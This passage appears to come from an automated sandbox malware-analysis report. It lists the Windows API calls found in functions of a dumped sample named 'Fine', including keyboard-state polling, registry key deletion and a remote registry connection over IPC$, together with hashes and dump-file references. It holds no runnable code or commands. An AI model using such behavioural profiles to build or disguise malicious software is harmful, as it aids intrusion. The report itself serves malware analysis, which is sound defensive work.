                                                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 0023CA49
                                                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 0023CA90
                                                                                                                                                                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0023CAD6
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0023CAEB
                                                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0023CB0C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0023E4D4
                                                                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0023E4FA
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023E504
                                                                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 0023E554
                                                                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0023E570
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0025D6C4
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0025D6ED
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0025D7A8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0025D70A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0025D71D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0025D72F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0025D765
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0025D788
                                                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 0025D753
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 0023EFCB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001EF215: timeGetTime.WINMM(?,?,0023EFEB), ref: 001EF219
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 0023EFF8
                                                                                                                                                                                                                                                                                                                            • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0023F01C
                                                                                                                                                                                                                                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0023F03E
                                                                                                                                                                                                                                                                                                                            • SetActiveWindow.USER32 ref: 0023F05D
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0023F06B
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0023F08A
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 0023F095
                                                                                                                                                                                                                                                                                                                            • IsWindow.USER32 ref: 0023F0A1
                                                                                                                                                                                                                                                                                                                            • EndDialog.USER32(00000000), ref: 0023F0B2
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                                                            • String ID: BUTTON
                                                                                                                                                                                                                                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0023F374
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0023F38A
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0023F39B
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0023F3AD
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0023F3BE
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                                                            • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00203007
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00202D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0020DB51,002A1DC4,00000000,002A1DC4,00000000,?,0020DB78,002A1DC4,00000007,002A1DC4,?,0020DF75,002A1DC4), ref: 00202D4E
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00202D38: GetLastError.KERNEL32(002A1DC4,?,0020DB51,002A1DC4,00000000,002A1DC4,00000000,?,0020DB78,002A1DC4,00000007,002A1DC4,?,0020DF75,002A1DC4,002A1DC4), ref: 00202D60
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00203013
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020301E
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00203029
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00203034
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020303F
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020304A
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00203055
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00203060
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020306E
                                                                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                            • String ID: &'
                                                                                                                                                                                                                                                                                                                            • API String ID: 776569668-2196087507
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0023A9D9
                                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 0023AA44
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 0023AA64
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 0023AA7B
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 0023AAAA
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 0023AABB
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 0023AAE7
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0023AAF5
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0023AB1E
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 0023AB2C
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 0023AB55
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 0023AB63
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00236649
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00236662
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 002366C0
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 002366D0
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 002366E2
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00236736
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00236744
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00236756
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00236798
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 002367AB
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002367C1
                                                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002367CE
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D2234: GetWindowLongW.USER32(?,000000EB), ref: 001D2242
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 001D2152
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 002128D1
                                                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002128EA
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002128FA
                                                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00212912
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00212933
                                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001D11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00212942
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0021295F
                                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001D11F5,00000000,00000000,00000000,000000FF,00000000), ref: 0021296E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1268354404-1658319840
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: GetCursorPos.USER32(?), ref: 001D19E1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: ScreenToClient.USER32(00000000,?), ref: 001D19FE
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: GetAsyncKeyState.USER32(00000001), ref: 001D1A23
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: GetAsyncKeyState.USER32(00000002), ref: 001D1A3D
                                                                                                                                                                                                                                                                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 002695C7
                                                                                                                                                                                                                                                                                                                            • ImageList_EndDrag.COMCTL32 ref: 002695CD
                                                                                                                                                                                                                                                                                                                            • ReleaseCapture.USER32 ref: 002695D3
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 0026966E
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00269681
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0026975B
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$(*$(*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1924731296-1629406331
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00220D31,00000001,0000138C,00000001,00000000,00000001,?,0024EEAE,002A2430), ref: 0023A091
                                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00220D31,00000001), ref: 0023A09A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00220D31,00000001,0000138C,00000001,00000000,00000001,?,0024EEAE,002A2430,?), ref: 0023A0BC
                                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00220D31,00000001), ref: 0023A0BF
                                                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0023A1E0
                                                                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                                                            • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a3bbad7f5328108eeb045078941e1bd99a3e9aa5a51b8640356a9264e6d3c559
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bcad581f7a3795bcac0c609531d0be01a43a863994b5eb45c0ef4052f4acf193
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3bbad7f5328108eeb045078941e1bd99a3e9aa5a51b8640356a9264e6d3c559
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A841417291420DAACF04FBE0DD86DEEB779AF28700F500066F506B2192EB756F59CB61
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
                                                                                                                                                                                                                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00231093
                                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002310AF
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002310CB
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002310F5
                                                                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0023111D
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00231128
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0023112D
                                                                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                                            • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 081ce3c8091846b1fe3e346b36a94582289b1389d61f83edf1c8c74751a5668e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f059e8758c2faa71d3d4b7128178be16a6cd2bc4c2eb2789bb7b1514a484efec
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 081ce3c8091846b1fe3e346b36a94582289b1389d61f83edf1c8c74751a5668e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2410872D1022DABDF15EFA4EC85DEEB7B9BF18750F04402AE905A3260EB719E15CB50
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00264AD9
                                                                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00264AE0
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00264AF3
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00264AFB
                                                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00264B06
                                                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00264B10
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00264B1A
                                                                                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00264B30
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00264B3C
                                                                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                                                            • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3ad05a59622b8132c393473dc36ead05014070bdaff2656d40238e23587f59e9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 5a23b2cabf369d13f3d63828eb3fd9180bbf390f08f70fb09032f00011a2c4e7
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ad05a59622b8132c393473dc36ead05014070bdaff2656d40238e23587f59e9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43316F71610219BBDF12AFA5EC08FDA3BA9FF0D324F114211FA55E61A0C7B5D8A0DB94
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 002546B9
                                                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 002546E7
                                                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 002546F1
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025478A
                                                                                                                                                                                                                                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 0025480E
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00254932
                                                                                                                                                                                                                                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0025496B
                                                                                                                                                                                                                                                                                                                            • CoGetObject.OLE32(?,00000000,00270B64,?), ref: 0025498A
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 0025499D
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00254A21
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00254A35
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
